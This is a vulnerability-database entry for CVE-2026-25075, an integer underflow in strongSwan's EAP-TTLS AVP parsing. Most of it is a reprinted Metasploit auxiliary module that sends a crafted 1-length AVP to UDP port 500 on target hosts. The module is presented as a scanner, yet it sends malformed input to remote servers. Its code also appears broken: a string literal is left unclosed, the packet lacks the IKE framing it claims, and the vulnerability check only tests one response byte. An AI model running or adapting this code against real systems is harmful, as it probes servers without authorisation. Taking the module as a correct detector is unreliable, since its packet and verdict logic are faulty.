📄 strongSwan 4.5.0 EAP-TTLS Integer Underflow

🗓️ 11 May 2026 00:00:00Reported by indoushkaType

Detects CVE-2026-25075 AVP length underflow in strongSwan EAP-Tunneled Transport Layer Security using a 1-length header.

Reporter	Title	Published	Views	Family All 69
ATTACKERKB	CVE-2026-25075	23 Mar 202618:33	–	attackerkb
GithubExploit	Exploit for CVE-2026-25075	26 Mar 202617:16	–	githubexploit
CBLMariner	CVE-2026-25075 affecting package strongswan for versions less than 5.9.14-9	25 Mar 202622:53	–	cbl_mariner
Circl	CVE-2026-25075	23 Mar 202619:23	–	circl
CNNVD	strongSwan 代码问题漏洞	23 Mar 202600:00	–	cnnvd
CVE	CVE-2026-25075	23 Mar 202618:33	–	cve
Cvelist	CVE-2026-25075 strongSwan 4.5.0 < 6.0.5 EAP-TTLS AVP Parsing Integer Underflow	23 Mar 202618:33	–	cvelist
Debian	[SECURITY] [DLA 4512-1] strongswan security update	27 Mar 202618:21	–	debian
Debian	[SECURITY] [DSA 6176-1] strongswan security update	23 Mar 202617:07	–	debian
Debian CVE	CVE-2026-25075	23 Mar 202618:33	–	debiancve

==================================================================================================================================
    | # Title     : strongSwan 4.5.0 EAP-TTLS Integer Underflow Vulnerability Scanner                                                |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://strongswan.org/                                                                                          |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module is designed to detect a vulnerability in strongSwan’s EAP-TTLS implementation, identified as CVE-2026-25075. 
                     The issue is related to an integer underflow in the handling of AVP (Attribute-Value Pair) length fields during IKE-related UDP communication.
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
    include Msf::Exploit::Remote::Udp
    include Msf::Auxiliary::Scanner
    include Msf::Auxiliary::Report
    
    def initialize(info = {})
    
    super(
    update_info(
    info,
    'Name' => 'strongSwan EAP-TTLS AVP Integer Underflow Scanner',
    
    'Description' => %q{
    
    This module exploits CVE-2026-25075 in strongSwan to investigate a flaw in the handling of AVP (Integer Underflow) length. The module sends a 1-length AVP header with no data, which is sufficient to detect the vulnerability without causing a crash. Server.
    
    },
    'Author' => ['indoushka'],
    
    'License' => MSF_LICENSE,
    
    'References' => [
    ['CVE', '2026-25075'],
    
    ['URL', 'https://www.strongswan.org/']
    
    ],
    
    'DisclosureDate' => '2026-02-15',
    
    'Notes' => {
    'Stability' => [CRASH_SAFE],
    
    'Reliability' => [],
    
    'SideEffects' => []
    
    }
    )
    )
    
    register_options(
    [
    Opt::RPORT(500),
    
    OptInt.new('IKE_TIMEOUT', [true, 'IKE request response timeout in seconds', 5])
    
    ]
    )
    
    end
    
    def craft_test_avp
    
    # Code: 79 (EAP-Message), Flags: 0x40 (Mandatory), Length: 1
    
    [79].pack('N') + [0x40].pack('C') + [1].pack('N')[1, 3]
    
    end
    
    def run_host(ip)
    
    vprint_status("#{ip} - Starting the CVE-2026-25075 scan...")
    
    begin
    
    connect_udp
    
    print_status("#{ip} - Sending an IKE_SA_INIT request...")
    
    test_packet = craft_test_avp
    
    udp_sock.put(test_packet)
    
    res = udp_sock.get(datastore['IKE_TIMEOUT'])
    
    if res
    
    if is_vulnerable?(res)
    
    print_good("#{ip} - Target is compromised With CVE-2026-25075 vulnerability!)
    
    report_vuln(
    host: ip,
    name: self.name,
    refs: self.references,
    info: 'Server accepted AVP with invalid length (Integer Underflow)'
    
    )
    else
    vprint_status("#{ip} - Server correctly rejected the packet.")
    end
    
    else
    vprint_error("#{ip} - No response received from the server.")
    end
    
    rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED
    
    vprint_error("#{ip} - Unable to connect to UDP port #{datastore['RPORT']}")
    
    ensure
    disconnect_udp
    end
    end
    
    def is_vulnerable?(data)
    return false unless data && !data.empty?
    
    data.unpack1('C') == 1
    end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

11 May 2026 00:00Current

6Medium risk

Vulners AI Score6

CVSS 3.17.5

CVSS 48.7

EPSS0.00248

SSVC